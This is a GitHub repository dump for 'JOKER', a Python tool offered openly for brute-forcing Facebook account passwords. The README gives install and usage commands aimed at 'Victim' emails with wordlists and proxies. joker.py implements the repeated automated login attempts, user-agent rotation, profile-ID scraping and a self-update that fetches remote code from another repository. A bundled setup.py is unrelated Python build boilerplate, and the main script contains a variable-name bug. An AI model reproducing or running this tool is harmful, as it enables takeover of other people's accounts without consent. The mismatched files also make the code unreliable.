├── jk.PNG
├── index.html
├── .github
├── FUNDING.yml
└── workflows
│ └── python-publish.yml
├── LICENSE
├── README.md
├── joker.py
└── setup.py
/jk.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fikrado/JOKER-burtal-force/HEAD/jk.PNG
--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
1 |
JOKER facebook brutal force
2 |
3 | i creat this tool to make it the beat fb brutal force tool hhhhhhhhhhhhhhhhhhhhhhh
4 |
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: fikrado
4 | patreon: fikrado
5 | open_collective: # Replace with a single Open Collective username
6 | ko_fi: # Replace with a single Ko-fi username
7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9 | liberapay: fikrado
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
13 |
--------------------------------------------------------------------------------
/.github/workflows/python-publish.yml:
--------------------------------------------------------------------------------
1 | # This workflows will upload a Python Package using Twine when a release is created
2 | # For more information see: https://help.github.com/en/actions/language-and-framework-guides/using-python-with-github-actions#publishing-to-package-registries
3 |
4 | name: Upload Python Package
5 |
6 | on:
7 | release:
8 | types: [created]
9 |
10 | jobs:
11 | deploy:
12 |
13 | runs-on: ubuntu-latest
14 |
15 | steps:
16 | - uses: actions/checkout@v2
17 | - name: Set up Python
18 | uses: actions/setup-python@v2
19 | with:
20 | python-version: '3.x'
21 | - name: Install dependencies
22 | run: |
23 | python -m pip install --upgrade pip
24 | pip install setuptools wheel twine
25 | - name: Build and publish
26 | env:
27 | TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }}
28 | TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
29 | run: |
30 | python setup.py sdist bdist_wheel
31 | twine upload dist/*
32 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 Yahye Abdirahman
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## Find Fikrado on :
2 | [](https://github.com/fikrado)
3 | [](https://www.instagram.com/mr__yahe)
4 | [](https://t.me/fikrado_hacker)
5 | [](https://facebook.com/fikrado4048063)
6 |
7 | # JOKER FACEBOOK BRUTAL FORCE ATTACK
8 |
9 | -----------------------------------------------------------------------------------------------
10 | ## Is facebook burtalforce attack tool you can use it in this OS and applications
11 | -------------------------------------------------------------------------------------------------
12 | ##### 1: KALI LINUX
13 | ##### 2: ALL LINUX OS
14 | ##### 3: TERMUX
15 | ##### 4: ANY OS THAT PYTHON INSTALLED ON IT
16 |
17 |
18 |
19 |
20 | ----------------------------------------------------------------------------
21 | ## HOW TO INSTALL JOKER BURTAL FORCE
22 | ```
23 | apt update
24 |
25 | apt install git -y
26 |
27 | pkg install python python2 && pip2 install requests mechanize
28 |
29 | git clone https://github.com/fikrado/JOKER-burtal-force
30 |
31 | cd JOKER-burtal-force
32 |
33 | python joker.py
34 |
35 | ```
36 | ###
37 |
38 | ------------------------------------------------------------------------------------------
39 | ## HOW TO USE JOKER BRUTAL FORCE
40 |
41 |
42 |
43 | ###
44 |
45 | ```
46 | python joker.py -t Victim@gmail.com -w /usr/share/wordlists/rockyou.txt
47 |
48 | python joker.py -t 100001013078780 -w C:\\Users\\Me\\Desktop\\wordlist.txt
49 |
50 | python jokere.py -t Victim@hotmail.com -w D:\\wordlist.txt -p 144.217.101.245:3129-
51 |
52 | python jokery.py -t Victim@gmail.com -s 1234567
53 |
54 | python joker.py -g https://www.facebook.com/Victim_Profile
55 |
56 | ```
57 | ###
58 |
59 |
60 | ________________________
61 |
62 |
63 |
64 | # VIDEO TUTORIAL HOW TO USE THE TOOL
65 |
66 | [](https://www.youtube.com/watch?v=iecKs0lwvaw)
67 |
68 | ________________________________________________________________
69 | # screan shot
70 |
71 |
72 |
--------------------------------------------------------------------------------
/joker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import socket, sys, os, re, random, optparse, time
4 | if sys.version_info.major <= 2:import httplib
5 | else:import http.client as httplib
6 |
7 | ## COLORS ###############
8 | wi="\033[1;37m" #>>White#
9 | rd="\033[1;31m" #>Red #
10 | gr="\033[1;32m" #>Green #
11 | yl="\033[1;33m" #>Yellow#
12 | #########################
13 | os.system("cls||clear")
14 | def write(text):
15 | sys.stdout.write(text)
16 | sys.stdout.flush()
17 |
18 | versionPath = "core"+os.sep+"version.txt"
19 |
20 | errMsg = lambda msg: write(rd+"\n["+yl+"!"+rd+"] Error: "+yl+msg+rd+ " !!!\n"+wi)
21 |
22 | try:import requests
23 | except ImportError:
24 | errMsg("[ requests ] module is missing")
25 | print(" [*] Please Use: 'pip install requests' to install it :)")
26 | sys.exit(1)
27 |
28 | try:import mechanize
29 | except ImportError:
30 | errMsg("[ mechanize ] module is missing")
31 | print(" [*] Please Use: 'pip install mechanize' to install it :)")
32 | sys.exit(1)
33 |
34 | class FaceBoom(object):
35 |
36 |
37 | def __init__(self):
38 | self.useProxy = None
39 | self.br = mechanize.Browser()
40 | self.br.set_handle_robots(False)
41 | self.br._factory.is_html = True
42 | self.br.addheaders=[('User-agent',random.choice([
43 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) RockMelt/0.9.58.494 Chrome/11.0.696.71 Safari/534.24',
44 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',
45 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2',
46 | 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
47 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
48 | 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6',
49 | 'Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20121202 Firefox/17.0 Iceweasel/17.0.1']))]
50 |
51 |
52 | @staticmethod
53 | def check_proxy(proxy):
54 | proxies = {'https':"https://"+proxy, 'http':"http://"+proxy}
55 | proxy_ip = proxy.split(":")[0]
56 | try:
57 | r = requests.get('https://www.wikipedia.org',proxies=proxies, timeout=5)
58 | if proxy_ip==r.headers['X-Client-IP']: return True
59 | return False
60 | except Exception : return False
61 |
62 |
63 | @staticmethod
64 | def cnet():
65 | try:
66 | socket.create_connection((socket.gethostbyname("www.google.com"), 80), 2)
67 | return True
68 | except socket.error:pass
69 | return False
70 |
71 |
72 | def get_profile_id(self, target_profile):
73 | try:
74 | print(gr+"\n["+wi+"*"+gr+"] geting target Profile Id... please wait"+wi)
75 | idre = re.compile('"entity_id":"([0-9]+)"')
76 | con = requests.get(target_profile).text
77 | idis = idre.findall(con)
78 | print(wi+"\n["+gr+"+"+wi+"]"+gr+" Target Profile"+wi+" ID: "+yl+idis[0]+wi)
79 | except IndexError:
80 | errMsg("Please Check Your Victim's Profile URL")
81 | sys.exit(1)
82 |
83 |
84 | def login(self,target, password):
85 |
86 | try:
87 | self.br.open("https://facebook.com")
88 | self.br.select_form(nr=0)
89 | self.br.form['email']=target
90 | self.br.form['pass']= password
91 | self.br.method ="POST"
92 | if self.br.submit().get_data().__contains__(b'home_icon'):return 1
93 | elif "checkpoint" in self.br.geturl(): return 2
94 | return 0
95 | except(KeyboardInterrupt, EOFError):
96 | print(rd+"\n["+yl+"!"+rd+"]"+yl+" Aborting"+rd+"..."+wi)
97 | time.sleep(1.5)
98 | sys.exit(1)
99 | except Exception as e:
100 | print(rd+" Error: "+yl+str(e)+wi+"\n")
101 | time.sleep(0.60)
102 |
103 |
104 | def banner(self,target,wordlist,single_passwd):
105 |
106 | proxystatus = gr+self.useProxy+wi+"["+gr+"ON"+wi+"]" if self.useProxy else yl+"["+rd+"OFF"+yl+"]"
107 | print(gr+"""
108 | ==================================
109 | [---] """+wi+"""JOKER BF"""+gr+""" [---]
110 | ==================================
111 | [---] """+wi+"""BruteForce Facebook """+gr+""" [---]
112 | ==================================
113 | [---] """+yl+"""CONFIG"""+gr+""" [---]
114 | ==================================
115 | [>] Target :> """+wi+target+gr+"""
116 | {}""".format("[>] Wordlist :> "+yl+str(wordlist) if not single_passwd else "[>] Password :> "+yl+str(single_passwd))+gr+"""
117 | [>] ProxyStatus :> """+str(proxystatus)+wi)
118 | if not single_passwd:
119 | print(gr+"""\
120 | =================================="""+wi+"""
121 | [~] """+yl+"""Brute"""+rd+""" ForceATTACK: """+gr+"""Enabled """+wi+"""[~]"""+gr+"""
122 | ==================================\n"""+wi)
123 | else:print("\n")
124 |
125 |
126 | @staticmethod
127 | def updateFaceBoom():
128 | if not os.path.isfile(versionPath):
129 | errMsg("Unable to check for updates: please re-clone the script to fix this problem")
130 | sys.exit(1)
131 | write("[~] Checking for updates...\n")
132 | conn = httplib.HTTPSConnection("raw.githubusercontent.com")
133 | conn.request("GET", "/Oseid/FaceBoom/master/core/version.txt")
134 | repoVersion = conn.getresponse().read().strip().decode()
135 | with open(versionPath) as vf:
136 | currentVersion = vf.read().strip()
137 | if repoVersion == currentVersion:write(" [*] The script is up to date!\n")
138 | else:
139 | print(" [+] An update has been found ::: Updating... ")
140 | conn.request("GET", "/Oseid/FaceBoom/master/faceboom.py")
141 | newCode = conn.getresponse().read().strip().decode()
142 | with open("faceboom.py", "w") as faceBoomScript:
143 | faceBoomScript.write(newCode)
144 | with open(versionPath, "w") as ver:
145 | ver.write(repoVersion)
146 | write(" [+] Successfully updated :)\n")
147 |
148 | parse = optparse.OptionParser(wi+"""
149 | Usage: python ./joker.py [OPTIONS...]
150 | -------------
151 | \x1b[1;96m 88 88
152 | \x1b[1;96m "" 88
153 | \x1b[1;96m 88
154 | \x1b[1;96m 88 ,adPPYba, 88 ,d8 ,adPPYba, 8b,dPPYba,
155 | \x1b[1;96m 88 a8" "8a 88 ,a8" a8P_____88 88P' "Y8
156 | \x1b[1;96m 88 8b d8 8888[ 8PP""""""" 88
157 | \x1b[1;96m 88 "8a, ,a8" 88`"Yba, "8b, ,aa 88
158 | \x1b[1;96m 88 `"YbbdP"' 88 `Y8a `"Ybbd8"' 88
159 | \x1b[1;96m ,88
160 | \x1b[1;96m888P"
161 |
162 |
163 | Examples:
164 | |
165 | |--------
166 | | python joker.py -t Victim@gmail.com -w /usr/share/wordlists/rockyou.txt
167 | |--------
168 | | python joker.py -t 100001013078780 -w C:\\Users\\Me\\Desktop\\wordlist.txt
169 | |--------
170 | | python jokere.py -t Victim@hotmail.com -w D:\\wordlist.txt -p 144.217.101.245:3129
171 | |--------
172 | | python jokery.py -t Victim@gmail.com -s 1234567
173 | |--------
174 | | python joker.py -g https://www.facebook.com/Victim_Profile
175 | |--------
176 | """)
177 |
178 |
179 | def Main():
180 | parse.add_option("-t","--target",'-T','--TARGET',dest="target",type="string",
181 | help="Specify Target Email or ID")
182 | parse.add_option("-w","--wordlist",'-W','--WORDLIST',dest="wordlist",type="string",
183 | help="Specify Wordlist File ")
184 | parse.add_option("-s","--single","--S","--SINGLE",dest="single",type="string",
185 | help="Specify Single Password To Check it")
186 | parse.add_option("-p","-P","--proxy","--PROXY",dest="proxy",type="string",
187 | help="Specify HTTP/S Proxy to be used")
188 | parse.add_option("-g","-G","--getid","--GETID",dest="url",type="string",
189 | help="Specify TARGET FACEBOOK PROFILE URL to get his ID")
190 | parse.add_option("-u","-U","--update","--UPDATE", dest="update", action="store_true", default=False)
191 | (options,args) = parse.parse_args()
192 | faceboom = FaceBoom()
193 | target = options.target
194 | wordlist = options.wordlist
195 | single_passwd = options.single
196 | proxy = options.proxy
197 | target_profile = options.url
198 | update = options.update
199 | opts = [target,wordlist,single_passwd, proxy, target_profile, update]
200 | if any(opt for opt in opts):
201 | if not faceboom.cnet():
202 | errMsg("Please Check Your Internet Connection")
203 | sys.exit(1)
204 | if update:
205 | faceboom.updateFaceBoom()
206 | sys.exit(1)
207 | elif target_profile:
208 | faceboom.get_profile_id(target_profile)
209 | sys.exit(1)
210 | elif wordlist or single_passwd:
211 | if wordlist:
212 | if not os.path.isfile(wordlist):
213 | errMsg("Please check Your Wordlist Path")
214 | sys.exit(1)
215 | if single_passwd:
216 | if len(single_passwd.strip()) < 6:
217 | errMsg("Invalid Password")
218 | print("[!] Password must be at least '6' characters long")
219 | sys.exit(1)
220 | if proxy:
221 | if proxy.count(".") != 3:
222 | errMsg("Invalid IPv4 ["+rd+str(proxy)+yl+"]")
223 | sys.exit(1)
224 | print(wi+"["+yl+"~"+wi+"] Connecting To "+wi+"Proxy[\033[1;33m {} \033[1;37m]...".format(proxy if not ":" in proxy else proxy.split(":")[0]))
225 | final_proxy = proxy+":8080" if not ":" in proxy else proxy
226 | if faceBoom.check_proxy(final_proxy):
227 | faceBoom.useProxy = final_proxy
228 | faceBoom.br.set_proxies({'https':faceBoom.useProxy, 'http':faceBoom.useProxy})
229 | print(wi+"["+gr+"Connected"+wi+"]")
230 | else:
231 | errMsg("Connection Failed")
232 | errMsg("Unable to connect to Proxy["+rd+str(proxy)+yl+"]")
233 | sys.exit(1)
234 |
235 | faceboom.banner(target,wordlist,single_passwd)
236 | loop,passwords = (1,open(wordlist).readlines()) if not single_passwd else ("~",[single_passwd])
237 | for passwd in passwords:
238 | passwd = passwd.strip()
239 | if len(passwd) <6:continue
240 | write(wi+"["+yl+str(loop)+wi+"] Trying Password[ {"+yl+str(passwd)+wi+"} ]")
241 | retCode = faceboom.login(target, passwd)
242 | if retCode:
243 | sys.stdout.write(wi+" ==> Login"+gr+" Success\n")
244 | print(wi+"========================="+"="*len(passwd)+"======")
245 | print(wi+"["+gr+"+"+wi+"] Password [ "+gr+passwd+wi+" ]"+gr+" Is Correct :)")
246 | print(wi+"========================="+"="*len(passwd)+"======")
247 | if retCode == 2:print(wi+"["+yl+"!"+wi+"]"+yl+" Warning: This account use ("+rd+"2F Authentication"+yl+"):"+rd+" It's Locked"+yl+" !!!")
248 | break
249 | else:
250 | sys.stdout.write(yl+" ==> Login"+rd+" Failed\n")
251 | loop = loop + 1 if not single_passwd else "~"
252 | else:
253 | if single_passwd:
254 | print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"The Password[ "+yl+passwd+wi+" ] Is Not Correct"+rd+":("+yl+"!"+wi)
255 | print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another password or Wordlist "+gr+":)"+wi)
256 | else:
257 | print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"I Can't Find The Correct Password In [ "+yl+wordlist+wi+" ] "+rd+":("+yl+"!"+wi)
258 | print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another Wordlist. "+gr+":)"+wi)
259 | sys.exit(1)
260 | else:
261 | print(parse.usage)
262 | sys.exit(1)
263 |
264 |
265 | if __name__=='__main__':
266 | Main()
267 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | import sys, os, imp, re, optparse
2 | from glob import glob
3 | from platform import machine as platform_machine
4 |
5 | from distutils import log
6 | from distutils import sysconfig
7 | from distutils import text_file
8 | from distutils.errors import *
9 | from distutils.core import Extension, setup
10 | from distutils.command.build_ext import build_ext
11 | from distutils.command.install import install
12 | from distutils.command.install_lib import install_lib
13 |
14 | # This global variable is used to hold the list of modules to be disabled.
15 | disabled_module_list = []
16 |
17 | def add_dir_to_list(dirlist, dir):
18 | """Add the directory 'dir' to the list 'dirlist' (at the front) if
19 | 1) 'dir' is not already in 'dirlist'
20 | 2) 'dir' actually exists, and is a directory."""
21 | if dir is not None and os.path.isdir(dir) and dir not in dirlist:
22 | dirlist.insert(0, dir)
23 |
24 | def find_file(filename, std_dirs, paths):
25 | """Searches for the directory where a given file is located,
26 | and returns a possibly-empty list of additional directories, or None
27 | if the file couldn't be found at all.
28 |
29 | 'filename' is the name of a file, such as readline.h or libcrypto.a.
30 | 'std_dirs' is the list of standard system directories; if the
31 | file is found in one of them, no additional directives are needed.
32 | 'paths' is a list of additional locations to check; if the file is
33 | found in one of them, the resulting list will contain the directory.
34 | """
35 |
36 | # Check the standard locations
37 | for dir in std_dirs:
38 | f = os.path.join(dir, filename)
39 | if os.path.exists(f): return []
40 |
41 | # Check the additional directories
42 | for dir in paths:
43 | f = os.path.join(dir, filename)
44 | if os.path.exists(f):
45 | return [dir]
46 |
47 | # Not found anywhere
48 | return None
49 |
50 | def find_library_file(compiler, libname, std_dirs, paths):
51 | result = compiler.find_library_file(std_dirs + paths, libname)
52 | if result is None:
53 | return None
54 |
55 | # Check whether the found file is in one of the standard directories
56 | dirname = os.path.dirname(result)
57 | for p in std_dirs:
58 | # Ensure path doesn't end with path separator
59 | p = p.rstrip(os.sep)
60 | if p == dirname:
61 | return [ ]
62 |
63 | # Otherwise, it must have been in one of the additional directories,
64 | # so we have to figure out which one.
65 | for p in paths:
66 | # Ensure path doesn't end with path separator
67 | p = p.rstrip(os.sep)
68 | if p == dirname:
69 | return [p]
70 | else:
71 | assert False, "Internal error: Path not found in std_dirs or paths"
72 |
73 | def module_enabled(extlist, modname):
74 | """Returns whether the module 'modname' is present in the list
75 | of extensions 'extlist'."""
76 | extlist = [ext for ext in extlist if ext.name == modname]
77 | return len(extlist)
78 |
79 | def find_module_file(module, dirlist):
80 | """Find a module in a set of possible folders. If it is not found
81 | return the unadorned filename"""
82 | list = find_file(module, [], dirlist)
83 | if not list:
84 | return module
85 | if len(list) > 1:
86 | log.info("WARNING: multiple copies of %s found"%module)
87 | return os.path.join(list[0], module)
88 |
89 | class PyBuildExt(build_ext):
90 |
91 | def __init__(self, dist):
92 | build_ext.__init__(self, dist)
93 | self.failed = []
94 |
95 | def build_extensions(self):
96 |
97 | # Detect which modules should be compiled
98 | missing = self.detect_modules()
99 |
100 | # Remove modules that are present on the disabled list
101 | extensions = [ext for ext in self.extensions
102 | if ext.name not in disabled_module_list]
103 | # move ctypes to the end, it depends on other modules
104 | ext_map = dict((ext.name, i) for i, ext in enumerate(extensions))
105 | if "_ctypes" in ext_map:
106 | ctypes = extensions.pop(ext_map["_ctypes"])
107 | extensions.append(ctypes)
108 | self.extensions = extensions
109 |
110 | # Fix up the autodetected modules, prefixing all the source files
111 | # with Modules/ and adding Python's include directory to the path.
112 | (srcdir,) = sysconfig.get_config_vars('srcdir')
113 | if not srcdir:
114 | # Maybe running on Windows but not using CYGWIN?
115 | raise ValueError("No source directory; cannot proceed.")
116 |
117 | # Figure out the location of the source code for extension modules
118 | # (This logic is copied in distutils.test.test_sysconfig,
119 | # so building in a separate directory does not break test_distutils.)
120 | moddir = os.path.join(os.getcwd(), srcdir, 'Modules')
121 | moddir = os.path.normpath(moddir)
122 | srcdir, tail = os.path.split(moddir)
123 | srcdir = os.path.normpath(srcdir)
124 | moddir = os.path.normpath(moddir)
125 |
126 | moddirlist = [moddir]
127 | incdirlist = ['./Include']
128 |
129 | # Platform-dependent module source and include directories
130 | platform = self.get_platform()
131 | if platform in ('darwin', 'mac') and ("--disable-toolbox-glue" not in
132 | sysconfig.get_config_var("CONFIG_ARGS")):
133 | # Mac OS X also includes some mac-specific modules
134 | macmoddir = os.path.join(os.getcwd(), srcdir, 'Mac/Modules')
135 | moddirlist.append(macmoddir)
136 | incdirlist.append('./Mac/Include')
137 |
138 | alldirlist = moddirlist + incdirlist
139 |
140 | # Fix up the paths for scripts, too
141 | self.distribution.scripts = [os.path.join(srcdir, filename)
142 | for filename in self.distribution.scripts]
143 |
144 | # Python header files
145 | headers = glob("Include/*.h") + ["pyconfig.h"]
146 |
147 | for ext in self.extensions[:]:
148 | ext.sources = [ find_module_file(filename, moddirlist)
149 | for filename in ext.sources ]
150 | if ext.depends is not None:
151 | ext.depends = [find_module_file(filename, alldirlist)
152 | for filename in ext.depends]
153 | else:
154 | ext.depends = []
155 | # re-compile extensions if a header file has been changed
156 | ext.depends.extend(headers)
157 |
158 | ext.include_dirs.append( '.' ) # to get config.h
159 | for incdir in incdirlist:
160 | ext.include_dirs.append( os.path.join(srcdir, incdir) )
161 |
162 | # If a module has already been built statically,
163 | # don't build it here
164 | if ext.name in sys.builtin_module_names:
165 | self.extensions.remove(ext)
166 |
167 | if platform != 'mac':
168 | # Parse Modules/Setup and Modules/Setup.local to figure out which
169 | # modules are turned on in the file.
170 | remove_modules = []
171 | for filename in ('Modules/Setup', 'Modules/Setup.local'):
172 | input = text_file.TextFile(filename, join_lines=1)
173 | while 1:
174 | line = input.readline()
175 | if not line: break
176 | line = line.split()
177 | remove_modules.append(line[0])
178 | input.close()
179 |
180 | for ext in self.extensions[:]:
181 | if ext.name in remove_modules:
182 | self.extensions.remove(ext)
183 |
184 | # When you run "make CC=altcc" or something similar, you really want
185 | # those environment variables passed into the setup.py phase. Here's
186 | # a small set of useful ones.
187 | compiler = os.environ.get('CC')
188 | args = {}
189 | # unfortunately, distutils doesn't let us provide separate C and C++
190 | # compilers
191 | if compiler is not None:
192 | (ccshared,cflags) = sysconfig.get_config_vars('CCSHARED','CFLAGS')
193 | args['compiler_so'] = compiler + ' ' + ccshared + ' ' + cflags
194 | self.compiler.set_executables(**args)
195 |
196 | build_ext.build_extensions(self)
197 |
198 | longest = max([len(e.name) for e in self.extensions])
199 | if self.failed:
200 | longest = max(longest, max([len(name) for name in self.failed]))
201 |
202 | def print_three_column(lst):
203 | lst.sort(key=str.lower)
204 | # guarantee zip() doesn't drop anything
205 | while len(lst) % 3:
206 | lst.append("")
207 | for e, f, g in zip(lst[::3], lst[1::3], lst[2::3]):
208 | print "%-*s %-*s %-*s" % (longest, e, longest, f,
209 | longest, g)
210 |
211 | if missing:
212 | print
213 | print "Failed to find the necessary bits to build these modules:"
214 | print_three_column(missing)
215 | print ("To find the necessary bits, look in setup.py in"
216 | " detect_modules() for the module's name.")
217 | print
218 |
219 | if self.failed:
220 | failed = self.failed[:]
221 | print
222 | print "Failed to build these modules:"
223 | print_three_column(failed)
224 | print
225 |
226 | def build_extension(self, ext):
227 |
228 | if ext.name == '_ctypes':
229 | if not self.configure_ctypes(ext):
230 | return
231 |
232 | try:
233 | build_ext.build_extension(self, ext)
234 | except (CCompilerError, DistutilsError), why:
235 | self.announce('WARNING: building of extension "%s" failed: %s' %
236 | (ext.name, sys.exc_info()[1]))
237 | self.failed.append(ext.name)
238 | return
239 | # Workaround for Mac OS X: The Carbon-based modules cannot be
240 | # reliably imported into a command-line Python
241 | if 'Carbon' in ext.extra_link_args:
242 | self.announce(
243 | 'WARNING: skipping import check for Carbon-based "%s"' %
244 | ext.name)
245 | return
246 |
247 | if self.get_platform() == 'darwin' and (
248 | sys.maxint > 2**32 and '-arch' in ext.extra_link_args):
249 | # Don't bother doing an import check when an extension was
250 | # build with an explicit '-arch' flag on OSX. That's currently
251 | # only used to build 32-bit only extensions in a 4-way
252 | # universal build and loading 32-bit code into a 64-bit
253 | # process will fail.
254 | self.announce(
255 | 'WARNING: skipping import check for "%s"' %
256 | ext.name)
257 | return
258 |
259 | # Workaround for Cygwin: Cygwin currently has fork issues when many
260 | # modules have been imported
261 | if self.get_platform() == 'cygwin':
262 | self.announce('WARNING: skipping import check for Cygwin-based "%s"'
263 | % ext.name)
264 | return
265 | ext_filename = os.path.join(
266 | self.build_lib,
267 | self.get_ext_filename(self.get_ext_fullname(ext.name)))
268 | try:
269 | imp.load_dynamic(ext.name, ext_filename)
270 | except ImportError, why:
271 | self.failed.append(ext.name)
272 | self.announce('*** WARNING: renaming "%s" since importing it'
273 | ' failed: %s' % (ext.name, why), level=3)
274 | assert not self.inplace
275 | basename, tail = os.path.splitext(ext_filename)
276 | newname = basename + "_failed" + tail
277 | if os.path.exists(newname):
278 | os.remove(newname)
279 | os.rename(ext_filename, newname)
280 |
281 | # XXX -- This relies on a Vile HACK in
282 | # distutils.command.build_ext.build_extension(). The
283 | # _built_objects attribute is stored there strictly for
284 | # use here.
285 | # If there is a failure, _built_objects may not be there,
286 | # so catch the AttributeError and move on.
287 | try:
288 | for filename in self._built_objects:
289 | os.remove(filename)
290 | except AttributeError:
291 | self.announce('unable to remove files (ignored)')
292 | except:
293 | exc_type, why, tb = sys.exc_info()
294 | self.announce('*** WARNING: importing extension "%s" '
295 | 'failed with %s: %s' % (ext.name, exc_type, why),
296 | level=3)
297 | self.failed.append(ext.name)
298 |
299 | def get_platform(self):
300 | # Get value of sys.platform
301 | for platform in ['cygwin', 'beos', 'darwin', 'atheos', 'osf1']:
302 | if sys.platform.startswith(platform):
303 | return platform
304 | return sys.platform
305 |
306 | def detect_modules(self):
307 | # Ensure that /usr/local is always used
308 | add_dir_to_list(self.compiler.library_dirs, '/usr/local/lib')
309 | add_dir_to_list(self.compiler.include_dirs, '/usr/local/include')
310 |
311 | # Add paths specified in the environment variables LDFLAGS and
312 | # CPPFLAGS for header and library files.
313 | # We must get the values from the Makefile and not the environment
314 | # directly since an inconsistently reproducible issue comes up where
315 | # the environment variable is not set even though the value were passed
316 | # into configure and stored in the Makefile (issue found on OS X 10.3).
317 | for env_var, arg_name, dir_list in (
318 | ('LDFLAGS', '-R', self.compiler.runtime_library_dirs),
319 | ('LDFLAGS', '-L', self.compiler.library_dirs),
320 | ('CPPFLAGS', '-I', self.compiler.include_dirs)):
321 | env_val = sysconfig.get_config_var(env_var)
322 | if env_val:
323 | # To prevent optparse from raising an exception about any
324 | # options in env_val that it doesn't know about we strip out
325 | # all double dashes and any dashes followed by a character
326 | # that is not for the option we are dealing with.
327 | #
328 | # Please note that order of the regex is important! We must
329 | # strip out double-dashes first so that we don't end up with
330 | # substituting "--Long" to "-Long" and thus lead to "ong" being
331 | # used for a library directory.
332 | env_val = re.sub(r'(^|\s+)-(-|(?!%s))' % arg_name[1],
333 | ' ', env_val)
334 | parser = optparse.OptionParser()
335 | # Make sure that allowing args interspersed with options is
336 | # allowed
337 | parser.allow_interspersed_args = True
338 | parser.error = lambda msg: None
339 | parser.add_option(arg_name, dest="dirs", action="append")
340 | options = parser.parse_args(env_val.split())[0]
341 | if options.dirs:
342 | for directory in reversed(options.dirs):
343 | add_dir_to_list(dir_list, directory)
344 |
345 | if os.path.normpath(sys.prefix) != '/usr':
346 | add_dir_to_list(self.compiler.library_dirs,
347 | sysconfig.get_config_var("LIBDIR"))
348 | add_dir_to_list(self.compiler.include_dirs,
349 | sysconfig.get_config_var("INCLUDEDIR"))
350 |
351 | try:
352 | have_unicode = unicode
353 | except NameError:
354 | have_unicode = 0
355 |
356 | # lib_dirs and inc_dirs are used to search for files;
357 | # if a file is found in one of those directories, it can
358 | # be assumed that no additional -I,-L directives are needed.
359 | lib_dirs = self.compiler.library_dirs + [
360 | '/lib64', '/usr/lib64',
361 | '/lib', '/usr/lib',
362 | ]
363 | inc_dirs = self.compiler.include_dirs + ['/usr/include']
364 | exts = []
365 | missing = []
366 |
367 | config_h = sysconfig.get_config_h_filename()
368 | config_h_vars = sysconfig.parse_config_h(open(config_h))
369 |
370 | platform = self.get_platform()
371 | (srcdir,) = sysconfig.get_config_vars('srcdir')
372 |
373 | # Check for AtheOS which has libraries in non-standard locations
374 | if platform == 'atheos':
375 | lib_dirs += ['/system/libs', '/atheos/autolnk/lib']
376 | lib_dirs += os.getenv('LIBRARY_PATH', '').split(os.pathsep)
377 | inc_dirs += ['/system/include', '/atheos/autolnk/include']
378 | inc_dirs += os.getenv('C_INCLUDE_PATH', '').split(os.pathsep)
379 |
380 | # OSF/1 and Unixware have some stuff in /usr/ccs/lib (like -ldb)
381 | if platform in ['osf1', 'unixware7', 'openunix8']:
382 | lib_dirs += ['/usr/ccs/lib']
383 |
384 | if platform == 'darwin':
385 | # This should work on any unixy platform ;-)
386 | # If the user has bothered specifying additional -I and -L flags
387 | # in OPT and LDFLAGS we might as well use them here.
388 | # NOTE: using shlex.split would technically be more correct, but
389 | # also gives a bootstrap problem. Let's hope nobody uses directories
390 | # with whitespace in the name to store libraries.
391 | cflags, ldflags = sysconfig.get_config_vars(
392 | 'CFLAGS', 'LDFLAGS')
393 | for item in cflags.split():
394 | if item.startswith('-I'):
395 | inc_dirs.append(item[2:])
396 |
397 | for item in ldflags.split():
398 | if item.startswith('-L'):
399 | lib_dirs.append(item[2:])
400 |
